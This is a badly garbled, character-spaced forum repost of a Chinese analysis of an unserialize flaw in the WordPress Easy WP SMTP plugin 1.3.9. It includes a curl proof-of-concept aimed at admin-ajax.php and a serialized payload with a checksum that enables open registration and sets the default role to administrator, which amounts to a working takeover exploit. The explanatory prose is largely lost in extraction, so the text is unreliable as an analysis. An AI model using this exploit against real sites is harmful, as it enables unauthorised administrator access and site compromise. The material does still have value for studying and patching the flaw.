[13951] 2019-04-05_WordPress插件EasyWPSMTP反序列化漏洞分析

文档创建者:s7ckTeam
浏览次数:5
最后更新:2025-01-18
2019-04-05_WordPress插件EasyWPSMTP反序列化漏洞分析 W o r d P r e s s E a s y   W P   S M T P d a w n e r   F r e e B u f   2 0 1 9 - 0 4 - 0 5 W o r d p r e s s     E a s y   W P   S M T P     v 1 . 3 . 9   v 1 . 3 . 8   v 1 . 3 . 9     a d m i n     h o o k / / / w p - a d m i n / a d m i n . p h p     a d m i n _ i n i t     a d m i n - a j a x . p h p     a c t i o n = s w p s m t p _ c l e a r _ l o g     a j a x     p o c   p o c   w p - c o n t e n t / p l u g i n s / e a s y - w p - s m t p / e a s y - w p - s m t p . p h p : : a d m i n _ i n i t N o t e ,   t h i s   d o e s   n o t   j u s t   r u n   o n   u s e r - f a c i n g   a d m i n   s c r e e n s .   I t   r u n s   o n   a d m i n - a j a x . p h p   a n d   a d m i n - p o s t . p h p   a s   w e l l . $   c u r l   h t t p s : / / V I C T I M . C O M / w p - a d m i n / a d m i n - a j a x . p h p   - F   ' a c t i o n = s w p s m t p _ c l e a r _ l o g '   - F   ' s w p s m t p _ i m p o r t _ s e t t i n g s = 1 '   - F   ' s w p s m t p _ i m p o r t _ s e t t i n g s _ f i l e = @ / t m p / u p l o a d . t x t ' $ i n _ r a w   =   f i l e _ g e t _ c o n t e n t s (   $ _ F I L E S [   ' s w p s m t p _ i m p o r t _ s e t t i n g s _ f i l e '   ] [   ' t m p _ n a m e '   ]   ) ;
使   a r r a y :   a r r a y / t m p / u p l o a d . t x t   d a t a     k e y - v a l u e u s e r s _ c a n _ r e g i s t e r   d e f a u l t _ r o l e     w p _ o p t i o n s   $ i n   =   u n s e r i a l i z e (   $ i n _ r a w   ) ; {     [ " u s e r s _ c a n _ r e g i s t e r " ] = >     s t r i n g ( 1 )   " 1 "     [ " d e f a u l t _ r o l e " ] = >     s t r i n g ( 1 3 )   " a d m i n i s t r a t o r " } " a : 2 : { s : 1 8 : " u s e r s _ c a n _ r e g i s t e r " ; s : 1 : " 1 " ; s : 1 2 : " d e f a u l t _ r o l e " ; s : 1 3 : " a d m i n i s t r a t o r " ; } " {     [ " d a t a " ] = >     s t r i n g ( 8 1 )   " a : 2 : { s : 1 8 : " u s e r s _ c a n _ r e g i s t e r " ; s : 1 : " 1 " ; s : 1 2 : " d e f a u l t _ r o l e " ; s : 1 3 : " a d m i n i s t r a t o r " ; } "     [ " c h e c k s u m " ] = >     s t r i n g ( 3 2 )   " 3 c e 5 f b 6 d 7 b 1 d b d 6 2 5 2 f 4 b 5 b 3 5 2 6 6 5 0 c 8 " } a : 2 : { s : 4 : " d a t a " ; s : 8 1 : " a : 2 : { s : 1 8 : " u s e r s _ c a n _ r e g i s t e r " ; s : 1 : " 1 " ; s : 1 2 : " d e f a u l t _ r o l e " ; s : 1 3 : " a d m i n i s t r a t o r " ; } " ; s : 8 : " c h e c k s u m " ; s : 3 2 : " 3 c e 5 f b 6 d 7 b 1 d b d 6 2 5 2 f 4 b 5 b 3 5 2 6 6 5 0 c 8 " ; } $ i n   =   u n s e r i a l i z e (   $ i n _ r a w   ) ; i f   (   e m p t y (   $ i n [   ' d a t a '   ]   )   )   {   e c h o   $ e r r _ m s g ;           w p _ d i e ( ) ; } i f   (   e m p t y (   $ i n [   ' c h e c k s u m '   ]   )   )   {   e c h o   $ e r r _ m s g ;           w p _ d i e ( ) ; } i f   (   m d 5 (   $ i n [   ' d a t a '   ]   )   ! = =   $ i n [   ' c h e c k s u m '   ]   )   {   e c h o   $ e r r _ m s g ;           w p _ d i e ( ) ; } u n s e r i a l i z e (   $ i n _ r a w   ) ; u n s e r i a l i z e (   $ i n [ ' d a t a ' ]   ) {     [ " u s e r s _ c a n _ r e g i s t e r " ] = >     s t r i n g ( 1 )   " 1 "     [ " d e f a u l t _ r o l e " ] = >     s t r i n g ( 1 3 )   " a d m i n i s t r a t o r " } f o r e a c h   (   $ d a t a   a s   $ k e y   = >   $ v a l u e   )   {                 u p d a t e _ o p t i o n (   $ k e y ,   $ v a l u e   ) ; }
          b r a n c h     k e y v a l u e   使 $ w p d b     s q l   u p d a t e C r i t i c a l   z e r o - d a y   v u l n e r a b i l i t y   f i x e d   i n   W o r d P r e s s   E a s y   W P   S M T P   p l u g i n . * d a w n e r F r e e B u f . C O M / w p - i n c l u d e s / o p t i o n . p h p : : u p d a t e _ o p t i o n $ v a l u e   =   a p p l y _ f i l t e r s (   " p r e _ u p d a t e _ o p t i o n _ { $ o p t i o n } " ,   $ v a l u e ,   $ o l d _ v a l u e ,   $ o p t i o n   ) ; $ v a l u e   =   a p p l y _ f i l t e r s (   ' p r e _ u p d a t e _ o p t i o n ' ,   $ v a l u e ,   $ o p t i o n ,   $ o l d _ v a l u e   ) ; i f   (   $ v a l u e   = = =   $ o l d _ v a l u e   | |   m a y b e _ s e r i a l i z e (   $ v a l u e   )   = = =   m a y b e _ s e r i a l i z e (   $ o l d _ v a l u e   )   )   {         r e t u r n   f a l s e ; } $ r e s u l t   =   $ w p d b - > u p d a t e (   $ w p d b - > o p t i o n s ,   $ u p d a t e _ a r g s ,   a r r a y (   ' o p t i o n _ n a m e '   = >   $ o p t i o n   )   ) ;

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则